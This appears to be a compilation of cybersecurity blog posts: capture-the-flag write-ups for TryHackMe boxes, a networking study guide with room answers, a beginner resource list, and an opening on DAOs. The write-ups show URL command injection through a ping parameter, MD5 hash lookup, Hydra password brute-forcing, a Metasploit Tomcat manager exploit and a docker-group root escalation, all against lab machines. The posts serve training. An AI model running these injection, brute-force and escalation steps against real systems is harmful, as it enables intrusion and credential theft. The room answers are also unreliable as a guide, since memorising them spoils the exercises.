But first, what is a robots.txt file? To make it short, when Google bots are scrapping your website after keywords to enhance your SEO strategy and put it in the front page in every google search, they will look for what they need in every directory. However, you can indicate to them which directories they should NOT look for any keyword, and the way you indicate it to them is by configuring these directories in the robots.txt file. The reasons may vary, but usually the directories found in this file are really important for administrative work in the website, and they are also hidden from the public eye, which means that some really good intel can be found there. Some other files and folders that can bring you good information are admin, login and upload pages. But let's start with :31331/robots.txt to see what we can get.

Nice! We got some cool information about the site map, so let's go after it now.

A lot more information for us! Now we know about 2 pages we can explore (index.html is just the landing page), and we didn't even had to run a brute-forcing tool for that!

Looking for the what.html page, we can notice that it's just a work in progress page. We can look for any hidden in the source code, but apparently there are nothing outstanding hanging there.

When we go after that partners.html page, however, there is a login form there, just chilling. Login forms are amazing doors to the inner workings of a company, and exploiting them can be a really damaging.

Now, if we look in the source code, we are able to see some intriguing findings.

Here we have a link to an api.js script, and after clicking on it, we are able to find the script's code.

There is a really cool line of code here, and this is the following:

const url =http://${getAPIURL()}/ping?ip=${window.location.hostname}``

According to the code, it will try to ping the API to check if it's working. We can look for more information on this, by tweaking the parameters a bit and running it on our browser. Let's first it try with:

http://10.10.147.25:31331/ping?ip=10.9.208.115

Let me explain what I changed here. I switched the **${getAPIURL()}** field to our target's IP + the HTTP Port we are at right now. And I changed the **${window.location.hostname}** parameter to our machine's IP, in order to test if it can ping back our machine.

Hmmmm, apparently it didn't work as expected. However, if you remember, there are another HTTP Port open in this application, the 8081. Let's try with this one now by running

http://10.10.147.25:8081/ping?ip=10.9.208.115

Okay, this is way better! The output confirms that we can actually run and see terminal commands in our web browser! Now let's run a ls, the Linux command to list all the files in a given directory, with:

http://10.10.147.25:8081/ping?ip=ls``

It's a similar command from what we've used before, but now with a ls at the end instead of our machine's IP parameter.

Now we have some more information about a database related to our target application, that can be really useful for us.

So let's start exploring this database by running a cat on it. The whole command would be cat utech.db.sqlite, so we need to write http://10.10.147.25:8081/ping?ip=cat utech.db.sqlite`` in our browser, which returns:

Awesome! Now we have some (hashed) credentials that we can use. I mean, as soon as we decode them. So let's start creating some new files to store them in our machine.

To crack the hashes, first we gotta know which hashing algorithms were used to hash them in the first place. We can run hash-identifier f357a0c52799563c7c7b76c1e7543a32 in order to retrieve information about it.

hash-identifier has disclosed that it's possibly a MD5 hash that we are dealing with.

To look for a reverse lookup (since hashes are impossible to crack) we can go to https://md5hashing.net/hash. This website is linked to a database of hashes and their original values, and it compares whatever string it gets as input with values stored in the database in order to "decrypt" them.

Nice, so now we have full credentials for one of the users! r00t:n100906 is something we can use later, for sure. Now, let's repeat the same steps with the other user.

And then, finally:

However, now we didn't get a decrypted value from this. Which is okay, not all values can be stored in the decryption database, and sometimes - even if you have a specified wordlist with all the possible values for a credential - you won't get a result from it. That's a good point for the company (even though leaving hashes accessible to malicious actors is a massive negative point), so for brevity reasons we can move on to the next phase.

Phase 4 - Vulnerability Analysis

In this phase the pentester will leverage the systems and applications and their correspondent vulnerabilities. They will analyze the scope for each attack vector found out until this moment, and they will consider the best way to exploit them. In our case, we know that our target runs a FTP on port 21 and a SSH on port 22. It also runs some websites and, most importantly, even a login page. You can abuse your Google-Fu skills, and also get any information available and use https://www.exploit-db.com/ or searchsploit on the command line. In my personal taste I like to try low-hanging fruits first, or simply the obvious stuff. It's pretty common to overengineer your attack and try some extreme techniques, but sometimes you just need to keep it simple to attest that your target system isn't that secure.

That being said, we stand here with a lot of useful information about our target system already, including some credentials and three possible places where we can use them to move on to the Exploitation Phase: FTP, SSH and the login page. With that in mind, let's do as I said and try those.

Phase 5 - Exploitation Phase

The Exploitation phase is the moment where you gather all the information acquired in the previous phases, and apply them with the sole objective of bypassing the target system's defenses and establish access to it. As I mentioned before, if the Vulnerability Analysis Phase was carefully planned, this current phase should be a precise attack. With our plan to use the credentials in mind, let's go and execute it.

By going to the :31331/partners.html, which is a login page, we use the credentials we found during the Enumeration phase, but it leads to a dead end.

That's okay. We keep this as a note, and move on to our second vector, the SSH on port 22. By using the credentials there, we can get into the system!

Those credentials can also be used to log into the FTP service, as showed in the screenshot below.

Okay, now that we have access in multiple fronts, we can say that we performed a successful Exploitation Phase.

Phase 6 - Post-Exploitation Phase

This phase is the proof that a well-executed penetration test won't finish once the pentester obtained access to the machine. Now it's time to move on and try to (if previously agreed on the pre-engagement phase, of course) 1) Observe which sensitive files that can be accessed by a possible attacker 2) Try to escalate privileges 3) Cause denial of service 4) Maintain and persist access for later exploitation.

We can start looking around for critical files, but a good way a CTF-based box such as the ones we can find on TryHackMe and HackTheBox emulates these files is by using flags. One has to keep in mind that flags alone are not what you will see on a real-world scenario. That being said, let's try to look for the root user SSH private key, as specified by the original box exercise.

To check which programs can be accessed by the super user on Linux, I like to run sudo -l. This can be a good way to enumerate attacking vectors for you to escalate your privileges to the root user. However, in this specific case, this didn't work.

As we can see in the screenshot above, the r00t user (just a regular user, not the actual root user) is part of a docker group, which can be a way to escalate privileges. We can check this out and confirm our theory by running LinEnum, that we can find on https://raw.githubusercontent.com/rebootuser/LinEnum/master/LinEnum.sh. Once we access it, we just need to copy the raw code, move back to the r00t base directory, create a linenum.sh file (using nano or vim, for example) and paste it there, save the file and make it executable by running chmod +x linenum.sh ****

We can now run ./linenum.sh > lin to run the script and save the information in a newly created lin file. It might take a while, but once it's done we just need to open that file to get the following outcome:

As the script mentioned there, looks like we're hosting Docker, and we could possibly misuse this group's permissions.

An awesome resource for privilage escalation is the GTFOBins, and it has a specific section just for docker exploitation, as we can find here - https://gtfobins.github.io/gtfobins/docker/#sudo

This one specifically explains how we can move to sudo by misusing Docker permissions, and we just need to run a simple command:

sudo docker run -v /:/mnt --rm -it alpine chroot /mnt sh

However, this command will try to get a vanilla docker box - alpine - and in our case it won't work properly. With a simple tweak, however, we can change this. We just need to switch from alpine to bash and remove the sudo command, since we're not currently running as sudo*:*

docker run -v /:/mnt --rm -it bash chroot /mnt sh

After a short wait, the exploit concludes and we have sucessfully escalated our privileges

Now that we are running out the highest of the privileges, we can start looking for useful information - as it's mentioned as the main objective of the post-exploitation phase.

Here we can find some critical, sensitive information, such as this private.txt file and the SSH keys. This is an awesome finding, and for the context and scope of this box, it also concludes our post-exploitation phase.

Phase 7 - Reporting Phase

This is the point where you are going to conclude all processes, findings, attacking vectors and analysis from your whole penetration test assessment, in a clear, objective language that will make it easy to understand for the stakeholders that will use it to lead their decision-making process in the company. This is arguably the second most important Phase in the whole process, sometimes even more important than the Information Gathering Phase, because if it's not clear, the whole assessment won't be useful at all to the company.

There are a lot of models and layouts for you to create your own reports, but the most important aspect of it is the need to be understood. Details are also important here, and a good guideline can be found at http://www.pentest-standard.org/index.php/Reporting

Conclusion

This concludes this post, which was written with the intention to kickstart people into Pentesting and Cybersecurity. However, this isn't a final read, just a suggestion on how you can start developing your own methodology. I recommend you start researching on other people's methodologies, as well as practice a lot of techniques on CTFs and even bug bounties. This will get the gears spinning and making things easier to understand in the long run.

I wrote another post on how to get people started in Cybersecurity that can be useful for you to get a bit of a direction, so if you need to start somewhere, you can go there. And keep in mind that Cybersecurity is an ever-evolving field, so never stop learning. Try new stuff everyday, read a lot, get new perspectives on subjects you thought you had mastered, and stay humble! You'll never know everything, so be respectful with people that are just starting. Help them and try to learn something from them as well, because I do believe everyone has something to teach to someone else, no matter their levels of experience.

Keep on practicing, and connect with me on Twitter to ask any questions and give some feedback (or just chat!)

An Introdution to Networks - A TryHackMe Introductory Networking WriteUp

Artur Serra — Tue, 23 Feb 2021 19:29:33 +0000

Intro

Understanding how packets travel from one endpoint to another in the Network, as well as understanding how to properly secure or intercept those packets, is an invaluable knowledge when it comes to Cybersecurity. Networking can be subdivided into multiple subjects and in this article we'll look deeper into this concept, in order to learn how important it is to understand Networking.

Acknowledgements

I'm writing this article as part of my process to take eJPT and just fixate the knowledge I got from INE's official Learning Path, Penetration Testing Student, by Lukasz Mikula. I truly believe that learning is more of an active process than a passive one, so I do think I can better understand things once I'm teaching other people about that subject and practicing around it. I'll try to take this approach in this article as well. We'll start with a bit of theory, which is really necessary when it comes to Networking, but we'll go practical as well with TryHackMe's rooms. I'll do my write-up to all the necessary rooms, so you can learn a bit more about my methodologies and try them yourself. No worries if you just do a step-by-step follow-up in the beginning, as long as you understand all the procedures and start to build your own processes and methodologies.

The main objective with this article, at the end of the day, is to provide an easy-to-understand starting guide to all those who want to kickstart their lifes in Cybersecurity. It can also work as a study companion material to all those who are studying to eJPT. It can also be a study companion to newcomers in the CTF community, who just joined TryHackMe and want to get some write-ups for a bunch of popular rooms. Or it can just be a study guide to introduce some core concepts from Cybersecurity to curious people!

Networking Fundamentals

OSI Model - An Overview

First of all, we need to understand what Computer Networking means. In a very abstract manner, we can consider Computer Networking as "the practice of interfacing two or more computing devices with each other for the purpose of sharing data." (Bradley Mitchell). This interaction can occur in different "flavors", like LANs or WANs, and also different designs, such as client-server and peer-to-peer.

Computer Networking also has a standard basic model that can be used to better visualize and understand the theory behind it. This model is called OSI Model:

The Data Journey across the Network

7 - Application Layer

This is the top layer, the one most end users see. It's the layer that receives input from and displays data to the end user. However, the application itself does not reside in the Application layer. This layer is just a platform to easily connect the information to the end-user by accepting communication requests inputted into the application, then wiring it down to lower layers. Web Browsers and FTP are good examples of Application Layer Communications.

6 - Presentation Layer

The Presentation Layer is usually called the "Translation Layer", because it represents the preparation from Application Formatting to Networking Formatting, or vice-versa. The Presentation Layer is not as visual as the Application Layer (if at all!), but it's responsible to "display" and translate data for the Application or the Network. Good examples of Presentation Layer artifacts is the process of encryption, decryption, compression and transformation of data for a secure transmission.

5 - Session Layer

If the Presentation Layer was the "translation layer", we can call the Session Layer a "Connection Layer". In order to maintain a "dialogue" between two computers, a session must be established. This layer is responsible not only for creating this bridge, but also to maintain, manage track and finish the conversation when required or needed.

4 - Transport Layer

The Transport Layer is the "Post-Office Layer" in the OSI Model. It coordinates all things related to data, like data transfers, how much data it will send, its transmission rate, where it is going, etc. Although they're not included in the OSI model, Transmission Control Protocols (TCP) and User Datagram Protocols (UDP) are categorized as Layer 4 Protocols. The TCP is a connection-based protocol, meaning that the connection between the two computers will be maintained for the whole duration of the request. It's also a patient connection, because it allows the two computers to keep a reliable connection, in which all packets are ensured to be delivered to the right place. For the whole duration, the bridge between the two computers will stay stable while data is sent in an acceptable speed. Lost packets will be recovered and re-sent. The UDP protocol is a hasty connection, meaning: If the computers can't keep up with its pace, it's their problems. Some usage examples are simple: If you need data accuracy over speed, choose TCP. If you need that all the packets are delivered (like in a video chat application), then speed must be prioritized over accuracy, and UDP seems to be a perfect selection.

3 - Network Layer

The Network Layer is responsible for locating the destination of your requests, as well as forwarding packets to the said destination. This is the home of the IP addresses and Logical Addressing, and also it's the layer where the connection will find the best route to take in order to establish a connection. This layer also handles logical addressing If a packet is too large to be transmitted, it can be dismantled into several fragments which are shipped out and then reassembled on the other end.

2 - Data Link Layer

The Data Link Layer is where the node-to-node data transfer happens. It's also home for the MAC (Media Access Control) Address, and it's considered a physical layer. The Layer 2 is divided into two sub-layers: MAC, or Media Access Control, and LLC, or Logical Link Control. MAC addresses determines the way devices in a network will gain access to a medium and how they'll get permission to transmit data over the network. LLC identifies and encapsulates network layer protocols and controls error checking and frame synchronization. The MAC Address is also responsible for the physical address of the machine, checking if received packets are corrupted, and also for formatting and preparing data that is about to be sent.

1 - Physical Layer

The Physical Layer represents the tangible end of the system. The electrical parts are included here, as well as layouts of pins, voltages, radio frequency links, and other physical requirements. It's a media layer used to transmit and receive raw bits of data (called segments) which it converts into all sorts of signals.

Which layer would you choose to send data over TCP or UDP?

The UDP and TCP protocols are handled by the Layer 4.

Which layer checks received packets to make sure that they haven't been corrupted?

One of the responsibilities of Layer 2 is to provide a physical address for the machine, format and prepare data and confirm if it the packets aren't corrupted.

In which layer would data be formatted in preparation for transmission?

As it was already mentioned in the question above, one of the responsibilities of Layer 2 is to provide a physical address for the machine, format and prepare data and confirm if it the packets aren't corrupted.

Which layer transmits and receives data?

One of the responsibilities of the Layer 1 is to transmit and receive data segments and convert them into signals.

Which layer encrypts, compresses, or otherwise transforms the initial data to give it a standardized format?

The process of encryption, decryption, compression and transformation of data for a secure transmission is a responsibility of the Layer 6

Which layer tracks communications between the host and receiving computers?

Layer 5 is responsible not only for creating this bridge, but also to maintain, manage track and finish the conversation when required or needed.

Which layer accepts communication requests from applications?

Layer 7 connects the information to the end-user by accepting communication requests inputted into the application, then wiring it down to lower layers.

Which layer handles logical addressing?

Layer 3 is the home of the IP addresses and Logical Addressing

When sending data over TCP, what would you call the "bite-sized" pieces of data?

Bite-sized pieces of data are called Segments

Which layer would the FTP protocol communicate with?

Web Browsers and FTP are good examples of Layer 7 Communications.

Which transport layer protocol would be best suited to transmit a live video?

If you need that all the packets are delivered (like in a video chat application), then speed must be prioritized over accuracy, and UDP seems to be a perfect selection.

Encapsulation

Whenever Data is passed down the multiple layers of the OSI Model, it gets encapsulated. It means that information about each of the layers is added to the data as a header, with information that is considered important to the next layer to evaluate. In the Data Link Layer, it also adds a trailer at the end of the data, which is used to confirm if that data was corrupted or not during its journey. During this journey, data's name can vary, being considered, for example, a Segment or Datagram while in the Transport Layer, and Frames while in the Data Link Layer. Once the data reaches its destination, the de-capsulation process begins, and the same steps are taken but in reverse order. You might ask why this whole process occurs, and the answer is simple. Headers added during the encapsulation process help not only managing critical information for the data to be send correctly to its destination, but it also adds an extra layer of security and reliability.

TCP/IP Model

As mentioned by MuirlandOracle on his TryHackMe's box, "it's important to understand exactly why the TCP/IP and OSI models were originally created. To begin with there was no standardisation -- different manufacturers followed their own methodologies, and consequently systems made by different manufacturers were completely incompatible when it came to networking. The TCP/IP model was introduced by the American DoD in 1982 to provide a standard -- something for all of the different manufacturers to follow. This sorted out the inconsistency problems. Later the OSI model was also introduced by the International Organisation for Standardisation (ISO); however, it's mainly used as a more comprehensive guide for learning, as the TCP/IP model is still the standard upon which modern networking is based."

It's also important to understand that the TCP/IP is a Connection-Oriented Protocol (Or Connection-Based Protocol*)*. According to the Oracle documentation, "it requires a logical connection to be established between the two processes before data is exchanged. The connection must be maintained during the entire time that communication is taking place, then released afterwards. The process is much like a telephone call, where a virtual circuit is established--the caller must know the person's telephone number and the phone must be answered--before the message can be delivered."

The whole communication in the TCP/IP Model works with a SYN/ACK connection, or a three-way handshake.

You might be asking: Okay, but how does this work?

It's quite simple! In a three-way handshake, the first computer sends a request to a second computer, indicating that it want to start a connection, to SYNchronize with it. The second computer then responds with a packet containing the SYNchronize information sent by the first computer, as well as an extra packet ACKnowledging the request to start a connection. Finally, the first computer will send over a final packet, containing only the ACKnowledgment that the conversation between those 2 computers can start.

Which model was introduced first, OSI or TCP/IP?

The first model to be introduced was the TCP/IP Model, in 1982. The OSI Model was introduced two years later, in 1984

Which layer of the TCP/IP model covers the functionality of the Transport layer of the OSI model (Full Name)?

As we could see in our graph, the Transport Layer of the OSI Model has its functionalities covered by the Transport Layer from the TCP/IP Model.

Which layer of the TCP/IP model covers the functionality of the Session layer of the OSI model (Full Name)?

As we could see in our graph, the Session Layer of the OSI Model has its functionalities covered by the Application Layer from the TCP/IP Model.

The Network Interface layer of the TCP/IP model covers the functionality of two layers in the OSI model. These layers are Data Link, and?.. (Full Name)?

As we could see in our graph, the Network Interface represents the funcionalities from the Data Link and the Physical Layer from the the OSI Model.

Which layer of the TCP/IP model handles the functionality of the OSI network layer?

As we could see in our graph, the Network Layer of the OSI Model has its functionalities covered by the Internet Layer from the TCP/IP Model.

What kind of protocol is TCP?

According to the Oracle Documentation, the TCP/IP Model is a Connection-Based protocol.

What is SYN short for?

Synchronize

What is the second step of the three way handshake?

SYN/ACK

What is the short name for the "Acknowledgement" segment in the three-way handshake?

ACK

Moving on to our first tool in this write-up, we open the .pcap file as suggested in the TryHackMe's room - https://tryhackme.com/room/introtonetworking

Once we open the file on WireShark and analyze the packets, we get the following information:

1 - For the first packet

2 - For the second packet

Going for the second packet, as suggested, we can start to answer the questions

What is the protocol specified in the section of the request that's linked to the Application layer of the OSI and TCP/IP Models?

Domain Name System

Which layer of the OSI model does the section that shows the IP address "172.16.16.77" link to (Name of the layer)?

Network

In the section of the request that links to the Transport layer of the OSI and TCP/IP models, which protocol is specified?

Wireshark displays the usage of User Datagram Protocol

Over what medium has this request been made (linked to the Data Link layer of the OSI model)?

The Ethernet II

Which layer of the OSI model does the section that shows the number of bytes transferred (81) link to?

The Frame 2 section links to the Physical Layer

[Research] Can you figure out what kind of address is shown in the layer linked to the Data Link layer of the OSI model?

According with the Pearson IT Certification, "a MAC address is a unique 6-byte address that is burned into each network interface or more specifically, directly into the PROM chip on the NIC. The number must be unique, as the MAC address is the basis by which almost all network communication takes place. No matter which networking protocol is being used, the MAC address is still the means by which the network interface is identified on the network. Notice that I say network interface. That’s very important, as a system that has more than one network card in it will have more than one MAC address.". That being said, we can attest that the address shown is a valid MAC address

Once the theory is past us, now it's time to move on to some practical applications on the network studies by using some useful tools to get a better understanding on those networks.

Networking Tools - Ping

For starters, let's take a look on Ping. This tool is used to test the connection between your machine and a remote target, either a web application or just another machine. By typing ping -h we are able to see on our Kali terminal all the options related to this tool, making it easier for us to plan and implement this usage during our daily tasks.

For a more detailed explanation and a deep dive into the documentation, you can also type man ping to access its manual, which we are going to do in order to answer the following questions.

What command would you use to ping the bbc.co.uk website?

For pinging any website, you simply need to write ping + website's URL/website's IP. So, in this case, the answer is simply ping bbc.co.uk

Ping muirlandoracle.co.uk. What is the IPv4 address?

By using ping [muirlandoracle.co.uk](http://muirlandoracle.co.uk) we can test a connection with the said website, and we can also find out what the IPv4 address for this website.

What switch lets you change the interval of sent ping requests?

What switch would allow you to restrict requests to IPv4?

What switch would give you a more verbose output

Networking Tools - Traceroute

Tracerout is also a really useful tool for you, since it's capable of follow the packets through your connection to the desired endpoint. If it's not installed by default on your Kali Linux, simply run apt-get install traceroute to download it.

What switch would you use to specify an interface when using Traceroute?

What switch would you use if you wanted to use TCP SYN requests when tracing the route?

[Lateral Thinking] Which layer of the TCP/IP model will traceroute run on by default (Windows)?

We know that by default, the Windows traceroute utility (tracert) operates using the same ICMP protocol that ping utilises, which is the Internet layer in the TCP/IP Model

Networking Tools - WHOIS

Most internet traffic occurs using DNS, the Domain Name System, which allows us to access Google by simply typing google.com in our browsers, instead of some nasty and complicated four octet's IP address. That being said, whois is a tool that can help us retrieve more informaton on websites we know only about its Domain Name. So, for example, if we want to get more information on Google, we simply type whois google.com and we are presented with a whole lot of information.

Perform a whois search on facebook.com

What is the registrant postal code for facebook.com?

When was the facebook.com domain first registered?

Perform a whois search on microsoft.com

Which city is the registrant based in?

[OSINT] What is the name of the golf course that is near the registrant address for microsoft.com?

To start this OSINT procedure, we need to know Microsoft's registrant address. By analyzing the information retrieved from our whois search, we are able to see the address is One Microsoft Way, Redmond, WA 98052. By typing it on Google Maps and zooming out a bit, we can see that Microsoft headquarter's are quite close to the Bellevue Golf Course.

What is the registered Tech Email for microsoft.com?

Networking Tools - Dig

Dig, a fantastic tool for troubleshooting networks, can provide a lot of information about the DNS servers related to a domain.

What is DNS short for?

DNS stands for Domain Name System, which provides a name to an IP address number.

What is the first type of DNS server your computer would query when you search for a domain?

Recursive.

What type of DNS server contains records specific to domain extensions (i.e. .com, .co.uk*, etc)*? Use the long version of the name.

This is a Top-Level Domain, the part of the domain that comes after the dot. It's divided into two categories, gTLD (generic top-level domain) and ccTLD (country-code top-level domain).

Where is the very first place your computer would look to find the IP address of a domain?

Local Cache

[Research] Google runs two public DNS servers. One of them can be queried with the IP 8.8.8.8, what is the IP address of the other one?

If a DNS query has a TTL of 24 hours, what number would the dig query show?

Considering that dig shows timestamps based in seconds, we simply need to 60 * 60 * 24 (The seconds in a day) to get the result of 86400

Bibliography

Resources to get you started in Cybersecurity (for free).

Artur Serra — Mon, 22 Feb 2021 15:28:19 +0000

Cybersecurity is an overwhelming subject. There are hundreds of paths one can take in order to get to one of the various jobs in the area. Pentester, DevSecOps Engineer, Blue Team Specialist are just some of the titles in the Cybersecurity microcosmos, and sometimes it can be really difficult to find the right way into it. This post isn't suppose to write the Ultimate Truth about CyberSec, but rather evaluate my experience breaking the first waves into this really gigantic ocean, and maybe serve as one of many other guidelines a prospect professional in this field should research and consider before making their own choices.

First, let's take a look into the technical or hard skills. These are the techniques and knowledge you gotta learn to stand out in most situations. I like to think that one should always be prepared for the opportunities that might appear, and getting proper knowledge and certifications in these three particular subjects is how you gonna build a strong foundation in Cybersecurity.

But something important to note is that hard skills can be learned at any time. Better than that, it's really good to develop your own soft skills! These are not as common to see in the regular script kid, but they are outstandingly necessary nevertheless. So it's good to learn how to clearly communicate your ideas, how to deal and lead people and how to be ready to develop and evolve everyday.

Okay, but how do I get started with all of this?

Right, right. Without further ado, let's jump into practical stuff here.

Over The Wire. This cyber wargame is the perfect starting point to get your feet wet and get a gist of the cybersecurity environment. Their most basic room, Bandit, is what you need to get some hands-on experience. And even though one of the most important skills a cybersecurity professional (and any cybersecurity professional, to be honest) could have is Googling your way around any trouble, I'll also add one of the many fantastic resources provided by John Hammond in this link here, where he explains everything you need to know in a really well-crafted walkthrough.
Linux System Administration. Knowing your work around Linux is an awesome way to troubleshoot problems in servers and cloud computing services, since most of them are Linux based. It's also good to leverage information while attacking a machine in a penetration test assessment. So going through this complete course on Geek's Lesson Youtube Channel is a nice way to start understanding how Linux works.
Offensive Security. Knowing how to run (or build) a network mapping tool, as well as understanding how to gather information and exploit a vulnerability you found are a must in a Cybersecurity technical role. Even if you're not aligned with the Red Team premises in your company, you better understand how the adversaries work, in order to better prepare your defenses or better design and develop your applications before releasing them into production. For that, this complete course from Heath Adams is all you need to get a practical way around hacking situations.
INE Cybersecurity Learning Paths. After acquiring the right to be the official training platform for eLearnSecurity's courses, INE became a mandatory stop in a prospect cybersecurity professional. PTS (Penetration Test Student, one of their learning paths) is the official course for one of the most prestigious entry-level penetration test certificates out there, the eJPT. And the best thing is: It's for free, meaning you only have to pay (as of now) $200 for the exam voucher, while all the learning costs absolutely nothing! That's a really good move for beginners, and considering how important certifications are in this field, no matter what career path you take, this is also an awesome kickstart for you!

Some additional resources.

FreeCodeCamp. With a free 300 hours curriculum focused on Cybersecurity (and some other 300 hours curriculums for various different subjects as well), FreeCodeCamp can provide you extra materials for you to start developing your own tools and applying some processes to better secure networks and applications.
GitHub. Github is well-known as a code repository and a geek paradise, but you can also find hundreds of repos with new tools, techniques and more resources for you to keep always developing your career and learning more every day. Some of my favorite Cybersecurity-related github repos are:
TryHackMe. In my humble opinion, the best learning resources for beginners. Just subscribe there and search for rooms and start hacking. Learn a lot from them, and if you wanna get a better perspective of what you're learning, you can subscribe to their platform and follow some learning paths, focused on both Offensive and Defensive techniques and situations.
Bug Bounty Hunting. Once you get all your basics done, it's time to put them into practice. But before you get a job, you can legally hack into companies that have a Bug Bounty Program. The path to find a bug is not easy, but you shouldn't go there for the financial reward of it. Take it as a learning experience, where you can probably find some bugs and earn some money in the process. This way you're going to practice your skills in real-world applications, and get a better glimpse on how things are done in the wild. For that, you can register to a bug bounty platform of your choice (like HackerOne or Intigrity), sign up to a program that you found interesting and start hacking! To help you in this journey, I can't recommend enough Katie from InsiderPhD, and her videos must be one of the better resources for beginner's out there.

TryHackMe - ToolsRUs WriteUp

Artur Serra — Thu, 04 Feb 2021 15:25:19 +0000

"Your challenge is to use the tools listed below to enumerate a server, gathering information along the way that will eventually lead to you taking over the machine.

This task requires you to use the following tools:

Dirbuster
Hydra
Nmap
Nikto
Metasploit"

The objective from this TryHackMe's room are explicit from the very beginning. We gotta learn how to use some core tools present in the current hacking environment, essential to push forward our methodologies in an easy, (usually) fast and automatic way. So let's start to check this room out and see if we can cover all tasks and answer all questions proposed here.

To start our Information Gathering phase, we run RustScan with docker run -it --rm --name rustscan rustscan/rustscan:1.1.0 10.10.64.71 in order to quickly find out more information about the open ports.

Once we know which ports are open, we run a really intense nmap focusing only on those ports, with the command nmap -T4 -A -Pn -O -v -p 22,1234,80 10.10.64.71

We get to find a lot of important information with the scan, especially that it's running two web clients, one on port 80 and another one on port 1234.

Since the one running on port 1234 seems to be just the default page from Apache Tomcat, let's focus on getting some more information on the "main" web client, the one running on port 80.

To start up our investigation, let's focus on the hero image on the page. It indicates that, even though the main page is down, there might be some secret directories. A common practice is to check the robots.txt file in order to find some hidden gems in a website.

However, accessing the /robots.txt returns a default 404. Not an optimal result, but default 404 are good pieces to disclose information on what kind of web server the application is running on.

We then run a gobuster with the command
gobuster dir -u http://10.10.64.71/ -w /usr/share/wordlists/dirbuster/directory-list-2.3-small.txt -t 40 -x .php,.txt,.bak,.html 2>/dev/null

This will not only look for directories in our wordlist, but also for extra file extensions such as php, txt, bak and html. This is important to find hidden login screens, backup files, development files and other kind of important information we can gather in this process, which is crucial to expand our attack surface.

Our gobuster scan returns some hidden directories, including the answer for the first question in this room:

Our gobuster scan returns some hidden directories, including the answer for the first question in this room:

guidelines

Accessing /guidelines, we get a message, a "developer leftover".

Whose name can you find from this directory?

bob

That's some valuable information, we might tackle it later.
Moving on with our discovery, we also found out about this other protected directory.

This basic authentication is also the answer for the next question:

What directory has basic authentication?

protected

We know one of the developers is called "bob", so probably this is also a username. In order to find out about their password, we can run Hydra with the command:
hydra -l bob -P /usr/share/wordlists/rockyou.txt -t 1 -f 10.10.64.71 http-get /protected/

After just a few seconds, we get a matching result, and also the answer for the fourth question in our room.

What is bob's password to the protected part of the website?

bubbles

When we try to log into the basic authentication, however, we find this new message, probably pointing to the other open port we found out before

The next questions refer to something we found out about earlier in our Information Gathering phase:

What other port that serves a webs service is open on the machine?

1234

Going to the service running on that port, what is the name and version of the software?

Apache Tomcat/7.0.88

Running a Nikto scan with nikto -h http://10.10.64.71:1234, we get to retrieve more useful information.

How many documentation files did Nikto identify?

5

Going back to our default 404, we can get information on how to answer the following question

What is the server version (run the scan against port 80)?

Apache/2.4.18

Now, accessing the http://:1234/manager/html and logging in with bob's credentials, we get to this admin page

On our nikto scan we could also get information on the Apache-Coyote, answering the next question.

What version of Apache-Coyote is this service using?

1.1

Considering we are dealing with a Tomcat Manager, let's look for it on searchsploit, with a simple searchsploit tomcat manager command

With all the information we gathered during this process, we are able to try to exploit the application. The first tool we are going for here is Metasploit, for two reasons: The first one is that it's a very good and versatile application, the second is reason is: With our searchsploit, we managed to find that the exploit in our system for this particular application is a .rb file, and considering that Metasploit is a Ruby-based application, most likely it's a Metasploit-ready exploit.

Diving deeper into our metasploit, we manage to find that exploit we found before on searchsploit. With that, we can set the RHOSTS to and the RPORT to 1234, as well as the HttpPassword to bubbles and HttpUsername to bob.

set RPORT 1234

set RHOSTS <IP>

set HttpPassword bubbles

set HttpUsername bob

set LHOST <VPN IP>

(If you don't want to exploit it using metasploit, there are some alternatives here):

Once everything is configured we can simply run the exploit with the command run (or exploit)

And then we have a shell! Running a getuid command, we manage to know we are running it as root! Awesome!
After exploring to the root folder, we manage to find the flag and read it!

And that's it! We managed to root the ToolsRUs machine, a quite useful way to learn about the various tools and techniques used to exploit an application! Kudos to TryHackMe for creating such a cool room for us to practice and sharpen our skills!

Some takeaways one can take from this particular room is the importance of a good information gathering phase. Most of the tools it highlights are related to this phase, that is - arguably - the most important step in the Pentest methodology. It's also good to have a nice plan B. As I also suggested, going for an alternative exploit that does not entirely depends on Metasploit is a good plan b, because sometimes meterpreter breaks or fails (or you just forgot to configure one of the important fields [like myself, not updating LHOSTS and hitting my face against the wall multiple times]).

The Power of DAOs

Artur Serra — Mon, 27 Jul 2020 18:17:15 +0000

Introduction

Imagine a new way of doing business inside an organization, with computers and code implementing the rules instead of managers, in a fully decentralized way and using the tech advantages of blockchain like less costs and way more speed to implement governance. That's what DAOs are able to do, but the best way to understand them is to first understand what each word in "Decentralized Autonomous Organization" means.

Let's start with "Organization". Traditional organizations are a collective of people willing to do something together in order to fulfill a common goal. It can be a non-profit focused on charity, it can be a company willing to revolutionize the market... when a group of people gather under a banner in order to pursue an objective, it can be called an organization. There is a caveat here: In DAOs, and in blockchain technology in general, there are no differences between people and machine: This equality is brought by the smart contracts, the code that provides the rules inside a DAO: if you are able to reach the requirements in the code, you can participate in the whole governance model provided by the DAO.
Then we have "Autonomous". As we just saw in the last paragraph, all the rules in a DAO are provided by the smart contracts. Those pieces of code are self-executing, which makes the organization self-governed as well. Once the rules are written, it will have its requirements. Any time an user - it might be a person or a machine - fulfills those requirements, the code will move to the next step, as it was originally programmed for. If it's not in the code, it doesn't exists. This is also the core of all the DAO's advantages and disadvantages, as we'll discuss in a bit more detail later.
And, finally, we have "Decentralized". The whole code that rules the organization is distributed. It doesn't falls under the hood of a single entity, it's not governed by any singular authority or government, it doesn't have a single physical address. This model, backed up by the blockchain technology, is one of DAO's most important features: It allows the organization to be global from the very first moment, and it allows members from all over the world, with no discrimination whatsoever, to have a voice in the decisions.
The world created by the existence of DAOs is fully based on innovation. First of, it leads to a new monetary paradigm, with decentralized, fully autonomous and trustworthy banks and governance models. It also creates a whole new model of products, that are built on top of blockchains and smart contracts, with their own tokens and cryptocurrencies, with their agent's identity protected by cryptography. Considering the currenct paradigm, with data theft and the abdication of all privacy we might have online, this new model leads to a safer way to conduct businesses, commerce and governance, in a private yet transparent and inclusive way.

DAO's advantages...

As already mentioned before, DAOs are an innovative and open model of creating organizations, which is by itself a really good reason to implement them. But let's take a deeper dive into the details of what makes the DAOs so powerful.

